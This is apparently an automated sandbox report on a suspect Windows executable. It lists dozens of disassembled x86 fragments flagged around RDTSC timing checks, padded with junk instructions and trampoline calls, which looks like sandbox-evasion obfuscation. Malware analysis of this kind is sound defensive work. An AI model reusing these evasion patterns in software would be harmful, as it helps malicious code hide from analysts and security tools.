Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EE66F second address: 5EE683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D39090h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0483 second address: 5F0496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FA6C4C2AB36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0496 second address: 5F049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F049A second address: 5F04A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F04A0 second address: 5F04A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0609 second address: 5F0623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB46h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F2703 second address: 5F270F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F270F second address: 5F2714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F2714 second address: 5F277E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, ebx 0x0000000c pushad 0x0000000d add ecx, dword ptr [ebp+122D2879h] 0x00000013 and ecx, 3B939F16h 0x00000019 popad 0x0000001a push 00000000h 0x0000001c jmp 00007FA6C4D39094h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FA6C4D39088h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d ja 00007FA6C4D3908Bh 0x00000043 xchg eax, esi 0x00000044 push ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F277E second address: 5F2782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F18A6 second address: 5F18AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F37DA second address: 5F37E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA6C4C2AB36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F486C second address: 5F4872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F4872 second address: 5F4878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F39C5 second address: 5F39D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA6C4D39086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F4878 second address: 5F487C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F788D second address: 5F7891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7891 second address: 5F7897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7897 second address: 5F78B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D39098h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F78B3 second address: 5F78B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F78B7 second address: 5F7923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FA6C4D39088h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D2482h] 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c push eax 0x0000002d mov si, di 0x00000030 pop edi 0x00000031 mov dword ptr [ebp+12466642h], ebx 0x00000037 popad 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007FA6C4D39088h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 push eax 0x00000055 jng 00007FA6C4D3908Eh 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8800 second address: 5F8805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8805 second address: 5F882E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4D39088h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d clc 0x0000000e push 00000000h 0x00000010 mov bx, D57Eh 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D2761h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jno 00007FA6C4D39088h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F69A6 second address: 5F6A5B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jc 00007FA6C4C2AB36h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 ja 00007FA6C4C2AB3Ch 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f popad 0x00000020 nop 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FA6C4C2AB38h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b xor edi, dword ptr [ebp+122D203Bh] 0x00000041 push dword ptr fs:[00000000h] 0x00000048 jc 00007FA6C4C2AB3Ch 0x0000004e add ebx, dword ptr [ebp+12458BC6h] 0x00000054 mov edi, 59213997h 0x00000059 mov dword ptr fs:[00000000h], esp 0x00000060 mov eax, dword ptr [ebp+122D0135h] 0x00000066 sub dword ptr [ebp+122D31C7h], esi 0x0000006c push FFFFFFFFh 0x0000006e mov dword ptr [ebp+122D2040h], edi 0x00000074 nop 0x00000075 pushad 0x00000076 jmp 00007FA6C4C2AB43h 0x0000007b jmp 00007FA6C4C2AB49h 0x00000080 popad 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6A5B second address: 5F6A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7B02 second address: 5F7B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6A61 second address: 5F6A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F97CF second address: 5F9821 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA6C4C2AB44h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, ecx 0x0000000f push 00000000h 0x00000011 and bh, FFFFFF81h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FA6C4C2AB38h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 pushad 0x00000031 stc 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push eax 0x00000038 pop eax 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7B0D second address: 5F7B74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, 3ABFh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, dword ptr [ebp+122D29C5h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 add edi, dword ptr [ebp+122D181Eh] 0x00000026 mov eax, dword ptr [ebp+122D0B0Dh] 0x0000002c jmp 00007FA6C4D39094h 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FA6C4D39088h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d cmc 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FA732 second address: 5FA736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F99F8 second address: 5F99FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F99FE second address: 5F9A03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FA7C4 second address: 5FA7C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F9A03 second address: 5F9A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FA6C4C2AB40h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FA7C8 second address: 5FA7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB6A2 second address: 5FB6A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB6A7 second address: 5FB6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D39096h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FA6C4D3908Bh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FA8E5 second address: 5FA8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB6D4 second address: 5FB776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 jng 00007FA6C4D3908Ch 0x0000000d mov dword ptr [ebp+122D1D40h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA6C4D39088h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f pushad 0x00000030 mov ecx, dword ptr [ebp+122D2875h] 0x00000036 mov dword ptr [ebp+1247D194h], edi 0x0000003c popad 0x0000003d mov dword ptr [ebp+122D2752h], ecx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007FA6C4D39088h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f mov edi, edx 0x00000061 pushad 0x00000062 jnp 00007FA6C4D3909Ch 0x00000068 mov dl, bl 0x0000006a popad 0x0000006b xchg eax, esi 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FA6C4D3908Dh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB776 second address: 5FB77A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A1EAF second address: 5A1EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 605E76 second address: 605ED4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FA6C4C2AB43h 0x00000010 pop ebx 0x00000011 jmp 00007FA6C4C2AB43h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA6C4C2AB46h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 605ED4 second address: 605ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60601B second address: 60603B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA6C4C2AB36h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA6C4C2AB3Ch 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60603B second address: 606046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6061B2 second address: 6061B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6061B6 second address: 6061BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6061BC second address: 6061C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60633B second address: 606355 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4D39086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FA6C4D39086h 0x00000014 jno 00007FA6C4D39086h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 606355 second address: 60635F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60635F second address: 60636F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007FA6C4D39086h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4D39 second address: 5E4D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C3CE second address: 60C3E5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4D3908Ch 0x00000008 jg 00007FA6C4D39086h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C3E5 second address: 60C3EF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C3EF second address: 60C3F9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4D3908Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C3F9 second address: 60C428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jnp 00007FA6C4C2AB40h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007FA6C4C2AB36h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FA6C4C2AB36h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FCAF second address: 60FCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA6C4D39086h 0x0000000a jmp 00007FA6C4D3908Fh 0x0000000f popad 0x00000010 jmp 00007FA6C4D39095h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FCE3 second address: 60FCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB3Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FCF6 second address: 60FD12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 jne 00007FA6C4D3908Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610430 second address: 610434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6105D7 second address: 6105EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39094h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610764 second address: 61076A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61076A second address: 61078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA6C4D39096h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61078B second address: 610790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6108E8 second address: 6108EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610A6E second address: 610AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jng 00007FA6C4C2AB36h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA6C4C2AB49h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610AA9 second address: 610AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610AAD second address: 610AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610AB9 second address: 610ABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610BB2 second address: 610BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610BB8 second address: 610BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610BBC second address: 610BC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6160E7 second address: 6160EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6160EB second address: 61610A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6C4C2AB43h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61610A second address: 61614F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6C4D39086h 0x00000008 jmp 00007FA6C4D39092h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FA6C4D3908Ch 0x00000015 jg 00007FA6C4D39086h 0x0000001b popad 0x0000001c je 00007FA6C4D390A2h 0x00000022 push esi 0x00000023 pushad 0x00000024 popad 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA6C4D3908Ah 0x0000002d jl 00007FA6C4D39086h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 614EC8 second address: 614ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 614ECF second address: 614ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 614ED5 second address: 614EDF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6C4C2AB36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EA5B7 second address: 5EA5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EA5BB second address: 5CAC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FA6C4C2AB38h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 call dword ptr [ebp+122D35EAh] 0x0000002b jne 00007FA6C4C2AB3Eh 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 jmp 00007FA6C4C2AB3Ah 0x00000039 jmp 00007FA6C4C2AB3Dh 0x0000003e pop edi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EA79A second address: 5EA7A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
